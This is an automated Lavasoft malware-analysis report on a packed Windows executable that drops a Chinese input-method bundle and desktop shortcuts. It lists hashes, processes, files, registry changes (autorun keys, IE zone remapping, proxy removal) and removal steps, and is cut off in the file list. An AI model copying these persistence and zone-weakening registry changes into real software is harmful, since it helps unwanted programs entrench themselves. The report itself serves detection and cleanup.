mzpefinder_pcap_file.YR (Lavasoft MAS) Behaviour: Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 002f865ab6cd2f05ca23808cbb09ebe3
SHA1: f8884bd41e88bfbe8c233259bba0b144453284f1
SHA256: 015f9407073db73916086c6cf68eb3e02a90dcded9db98f24ede64cf4345958d
SSDeep: 12288:Fla8UjwZQHW1F/K6fBEtdK7WGCMnA0xfpfx1k:Fl2w HspEvK7WGCwAup51k
Size: 595291 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-06-19 00:33:27
Analyzed on: WindowsXP SP3 32-bit
Summary: Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Malware creates the following process(es):
install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604
The Malware injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process CreateShortcut.exe:1284 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\影视大全.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\搜狗网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\爱淘宝.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsb6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl4.tmp (0 bytes)
The process %original file name%.exe:772 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nso1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp (0 bytes)
The process ksimekusu_zhim_007.exe:1896 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文之星双拼.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\蓝天双拼.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\我的短语.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\拼音加加双拼.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\中文符号.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\固顶字.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\双拼.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\智能ABC双拼.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOS双拼.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\修复.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快速拼音输入法\卸载.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂ˫ƴ.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\自然码双拼.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
The Malware deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (0 bytes)
The process OneDay.exe:604 makes changes in the file system.
The Malware creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes)
Registry activity
The process install.exe:432 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Ime File" = "KSIME.IME"
"Layout File" = "kbdus.dll"
[HKU\.DEFAULT\Keyboard Layout\Preload]
"2" = "E0200804"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Layout" = "E0200804"
[HKCU\Keyboard Layout\Preload]
"2" = "E0200804"
[HKLM\System\CurrentControlSet\Control\Keyboard Layouts\E0200804]
"Layout Text" = "快速拼音输入法"
The process CreateShortcut.exe:1284 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 85 2E 8A 86 6A D3 5B 60 0F 67 73 E0 9A F5 78"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
The process %original file name%.exe:772 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 C4 E6 03 D2 AC 58 0C E4 5E 45 06 D5 29 06 49"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process KS1426.exe:2000 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 95 C7 8D 1B 13 6F DE E5 23 8F 93 9A 07 1C 8E"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Config" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
"Count" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"CRand" = "433"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
The process ksimekusu_zhim_007.exe:1896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Qudao" = "ksimekusu_zhim_007"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy9.tmp\nsis.dll,"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Count" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Proc" = "KS1426.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayIcon" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKCR\JiSu.file\DefaultIcon]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"UninstallString" = "%Program Files%\KS2015011116\V1426\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"date" = "20150111"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayName" = "快速拼音输入法 3.0.3.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCR\JiSu.file\shell\open\command]
"(Default)" = "%Program Files%\KS2015011116\V1426\config.exe %1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\.wlb]
"(Default)" = "JiSu.file"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"Publisher" = "cxmx, Inc."
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\JiSu.file\shell\open]
"(Default)" = "安装字库"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"DisplayVersion" = "3.0.3.9"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"InstallDir" = "%Program Files%\KS2015011116\V1426"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\快速拼音输入法]
"URLInfoAbout" = "http://jiguangshurufa.com/"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 28 FE 77 6C CB 17 F1 B2 9E 76 A7 C5 65 8D BA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\JiSu.file]
"(Default)" = "字库文件 (.wlb)"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ksinput.exe]
"(Default)" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\JiSu.file\shell]
"(Default)" = "open"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\JisuSoft\KusuInput\3.0]
"Entry" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Malware modifies IE security-zone settings so that local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Malware modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
To run itself automatically each time Windows boots, the Malware adds the following reference to its file under the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
The Malware modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To run itself automatically each time Windows boots, the Malware adds the following reference to its file under the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
The Malware deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process OneDay.exe:604 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA CD 70 C1 06 21 03 54 44 44 C9 F0 FD 65 86 A3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."
Dropped PE files
MD5 | File path |
---|---|
6db1aab5dd1729e9045917fcc5c7a9bd | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeMini.dll |
e96186aaa638e2968eed3361f61ab0d5 | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeSkin.dll |
1d56753feda1d359317f39cd2926776d | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeTool.dll |
56c833a0a45ebc14e2bf0230fe8c4678 | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeUnit.dll |
293fe7132d2b950a6c4ee85b0f06a3ce | c:\Documents and Settings\All Users\Application Data\kusuInput\plugin\ImeWord.dll |
9ec7343e965f1f5da63daa34515be40e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\CreateShortcut.exe |
678e0ebb76fd1af1fce5ac082d682f94 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\Furt.exe |
254f13dfd61c5b7d2119eb2550491e1d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\NSISdl.dll |
d2acd1407a3d27c309ce750b97e13d77 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\OneDay.exe |
144bd6f3a3e1e040ffb03648e49c366d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe |
bacbca35f6b7e759fff3c6321f6f1b2a | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsy9.tmp\nsis.dll |
0e40d4a64f7f3637b3efb0ecbe645a6c | c:\Program Files\KS2015011116\V1426\DirectUI.dll |
2ac6987d52efc4e43955da4f3fb855e8 | c:\Program Files\KS2015011116\V1426\KS1426.exe |
ad42f2f8f08c085a04f2fd0d6b472176 | c:\Program Files\KS2015011116\V1426\Library.dll |
36d7d05505951f542922df4c725cc57d | c:\Program Files\KS2015011116\V1426\atl100.dll |
bea1a8d84f1d871c237b5634a7819047 | c:\Program Files\KS2015011116\V1426\config.exe |
1302954a19e63cb334c3e6a423caea0c | c:\Program Files\KS2015011116\V1426\imetool.exe |
ad41cb4c1277817b46d75f1af6aee58e | c:\Program Files\KS2015011116\V1426\imeunit.exe |
5d5609e55fefeff66ea45e524b422d56 | c:\Program Files\KS2015011116\V1426\imeword.exe |
9389d5662768d7abc078aecf51deada7 | c:\Program Files\KS2015011116\V1426\install.exe |
03e9314004f504a14a61c3d364b62f66 | c:\Program Files\KS2015011116\V1426\msvcp100.dll |
67ec459e42d3081dd8fd34356f7cafc1 | c:\Program Files\KS2015011116\V1426\msvcr100.dll |
bacbca35f6b7e759fff3c6321f6f1b2a | c:\Program Files\KS2015011116\V1426\nsis.dll |
ee68b052a08fec0f574f2dae2003df27 | c:\Program Files\KS2015011116\V1426\sqlite3.dll |
6dec6339ba7414dbee3b372ab94115a8 | c:\Program Files\KS2015011116\V1426\uninst.exe |
1cc5717f5e506daeb628506f10954788 | c:\WINDOWS\system32\ksime.ime |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
install.exe:432
CreateShortcut.exe:1284
%original file name%.exe:772
KS1426.exe:2000
ksimekusu_zhim_007.exe:1896
OneDay.exe:604
- Delete the original Malware file.
- Delete or disinfect the following files created/modified by the Malware:
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\影视大全.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\搜狗网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123网址导航.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\爱淘宝.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
